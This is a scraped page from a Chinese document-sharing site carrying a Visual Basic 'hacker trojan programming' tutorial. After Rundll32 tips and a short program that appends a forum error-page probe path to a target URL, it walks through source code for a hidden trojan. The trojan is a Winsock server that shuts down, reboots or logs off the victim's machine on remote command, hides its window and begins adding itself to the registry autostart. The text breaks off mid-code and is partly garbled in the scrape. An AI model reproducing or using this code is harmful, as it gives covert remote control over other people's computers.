vb黑客木马编程(精选大全)(免费).doc

参与科技活动，如黑客马拉松、编程比赛等 #生活乐趣# #日常生活乐趣# #学习新知识的乐趣# #科技新发现的乐趣#

1、VB黑客编程基础一. 调用系统“创建快捷方式”向导 是否为VB不支持创建快捷方式而于着急呢？虽然 您可以调用vb5stkitDll中的fCreateShellLink函 数，但它是为安装程序设计的，快捷方式的默认路径 总是从当前用户的“Start MenuPrograms”开始，也 就是说，如果您的Windows95装在C盘上，您无法通过 fCreateShellLink函数把快捷方式创建到D盘上去。 现在，给大家介绍一种极为方便、巧妙的方法： 用Shell语句调用系统“创建快捷方式”向导。 新建一个项目，在窗体上放一个按钮，双击此按 钮，加入以下代码： Private Sub Command1_Click() Open App.Path temp.lnk For Output As #1 Close #1 以上两句在程序所在目录建立一 个临时文件 Shell Rundll32.exe AppWiz.Cpl，NewLinkHere App.Path temp.lnk End Sub （注意：Shell语句中NewLinkHere后面跟着一个 空格才是引号，否则将出错。） 运行程序，按一

2、下命令按钮，怎么样？“创建快 捷方式”向导出现了，如果创建成功，快捷方式将取 代临时文件temp.lnk的位置，如果选取消，temp.lnk 也会自动消失。当然，您可以在硬盘的任意位置建立 temp.lnk。好，现在又可以为您的程序增添一项新功 能了。Enjoy！ 二. Rundll32.exe的用途 我们知道，用Shell语句只能调用可执行文件，即 exe、com、bat和pif文件，有时我们想要调用其他一 些系统功能该怎么办呢？此时，Windows提供的 Rundll32.exe可大显身手了。下面我们来认识一下这 些用法，也许会给您带来一点惊喜。 1要打开设置系统时间的控制面板文件 （Timedate.cpl),只需运行如下代码： Shell Rundll32.exe Shell32.dll,Control_RunDLL Timedate.cpl 至于打开其他控制面板文件，相信您一定能够举 一反三，尝试一下，换个文件名就成了。 2要运行某一快捷方式（*.lnk）则可以用以下 代码： She11 Rundll32.exe url.dll, FileProtocolHandler X

3、(X代表要运行的文件，包括 路径，下同。 3. 也可以这样写来打开ActiveMovie控制： Shell RUNDLL32.EXE amovie.ocx，Rundll,1 而用Shell RUNDLL32.EXE amovie.ocx，Rundll /play X,1 将直接播放媒体文件。 4. Shell rundll32.exe desk.cpl，InstallScreenSaver X”当然是安装屏幕保 护啦，如果你写了一个屏幕保护程序，那么可以在安 装程序中写上它，而不一定要装到system目录下。顺 便提一下，VB不是自捞一个“Application Setup Wizard”么？它的VB源代码都在安装目录下的 “setupkitsetup1”中放着呢，好好把它研究一下。 你完全能做出富有个性的安装程序来。 5.按住shift键，右击某一文件，菜单中会出现 “打开方式”选项，这也许已不是什么秘密。但现在， 用shell rundll32.exe shell32.dll OpenAs_RunDLL X 便能直接调用“打开方式”框。 6. 甚至能用这样一句来打印文件（包括HTM

4、L所 支持的所有文本与图像格式): Shell rundll32.exe MSHTML.DLL，PrintHTML X”, 1 怎么样？是不是小有收获呢？这下，您一定会对 Rundll32.exe这个平时不起眼的文件另眼相待了，它 可是系统运行必不可少的部件呢！其实 ShellRundll32还能调用其他许多系统功能，比如关 于NetMeeting和Telnet方面的。如果您有兴趣，可以 到往册表的“我的电脑HKEY_CLASSES_ROOT”或“我 的电脑HKEY_LOCAL_MACHINESoftwareCLASSES”下 去看看，本文的内容大都是从那里“抄”来的。只要 有足够的决心、信心、耐心，您一定能发现更多有价 值的东西。Good luck! 主要也就 /showerr.asp?BoardID=0&ErrCodes=60,60&action= 再起作用 程序所有代码仅此两段 Private Sub Command1_Click() WebBrowser1.Navigate (Text1.Text + /showerr.asp?BoardID=0&ErrCodes=60,60&

5、action=) End Sub Private Sub Command2_Click() End End Sub 程序下载. 首先，新建一工程，名为Server，新建一个窗体，Name为Server，在窗体中加入一个winsock控件，Name设为sckServer，协议设为默认的TCPIP协议。 接下来我们回来Server窗体模块中，添加如下代码： Private Sub form_Load() With Me .sckServer.LocalPort = 88917本地端口（呵呵！我的生日！） .sckServer.Listen 开始监听 End With End Sub 接受客户端的连接请求。 Private Sub sckServer_ConnectionRequest(ByVal requestID As Long) With Me If .sckServer.State sckClosed Then .sckServer.Close .sckServer.Accept (requestID) End With End Sub 下面我们来建立客户端程序：新建一个工程，名为C

6、lient，把窗体名为Client，在上面加入一个winsock控件，名为sckClient，协议为TCPIP协议。再加一个按钮cmdConnect在窗体模块中加入代码： Private Sub form_Load() With Me .sckClient.RemoteHost = 127.0.0.1设置远程IP，本例设为本机。 .sckClient.RemotePort = 88917 远程端口,就为server中的设置一样. End With End Sub Private sub cmdConnect_Click() SckClient.Connect End sub 至此，单击Connect按钮我们的两个工程已经可以进行通信了，但看不见，你可以在Client中的sckClient_Connect事件中加入代码：debug.print “Connetion successful!”来查看。 这仅是第一步，一点工作也做不了，下面我们来为它们添加功能。为了简单，本文章只实现一点小小的功能关机，重启，注销。好，开始吧！ 在Server工程中新建一个模块，Name为modApi，这个模快

7、为一些API函数，添加如下API函数： Public Declare Function ExitWindowXXX Lib user32 Alias ExitWindowXXX (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Const EWX_LOGOFF = 0 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Declare Function ClipCursor Lib user32 Alias ClipCursor (lpRect As Any) As Long Public Type RECT Left As Long Top As Long Right As Long Bottom As Long End Type 注：在两个socket中编程中，进行通信的重要事件是DataArrival事件，用于接收远程数据。 下面在Client工程的Client窗体中放入三个按钮，分别为cmdExit,cmdLogoff,cm

8、dReboot。它们用于对远程的关机，注销，重启操作。分别添加如下代码： Private Sub cmdExit_Click() Me.sckClient.SendData Exit End Sub Private Sub cmdLogoff_Click() Me.sckClient.SendData Logoff End Sub Private Sub cmdReboot_Click() Me.sckClient.SendData Reboot End Sub 全都是对服务端发出请求。下面转到Server工程中：在Server中添加sckServer的DataArrial事件，接收客户端的请求。 Private Sub sckServer_DataArrival(ByVal bytesTotal As Long) Dim strData As String With Me 接收客户请求的信息 .sckServer.GetData strData Select Case strData Case Exit 关机 Call ExitWindowXXX(EWX_SHUTDOWN, 0) Case Reboot 重启 Call ExitWindowXXX(EWX_REBOOT, 0) Case Logoff 注销 Call ExitWindowXXX(EWX_LOGOFF, 0) End Select End With End Sub 好了,到此我们已经实现功能了，但还不行，我们要它在背后运行。这简单，在Server中的form_Load事件中加入一句：me.hide。好这下看不见了，但大家知道木马是一开机就自动运行了，这又是为什么，怎么实现的？把它加入到注册表的启动组中？对，不错，跟我来吧！ 回到Server工程中的modApi中加入如下API函数： Public Declare Function RegOpenKey Lib advapi32.dll Alias RegOpenKeyA (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As

《vb黑客木马编程(精选大全)(免费).doc》由会员re****.1分享，可在线阅读，更多相关《vb黑客木马编程(精选大全)(免费).doc》请在金锄头文库上搜索。

网址：vb黑客木马编程(精选大全)(免费).doc https://www.yuejiaxmz.com/news/view/793283

相关内容

黑客如何学起？安全需要学什么技术？黑客入门.doc
Windows黑客编程技术详解【全本
从零开始学习黑客技术入门教程基础.doc
黑客学习步骤
黑客学习什么编程语言
(黑客入门教程)七天打造黑客.doc
C++ 黑客编程揭秘与防范(第2版)【全本
C++ 黑客编程揭秘与防范(第3版)【全本
vb智能杆
如何学习黑客技术？如何选编程语言？如何选适合黑客的操作系统？

随便看看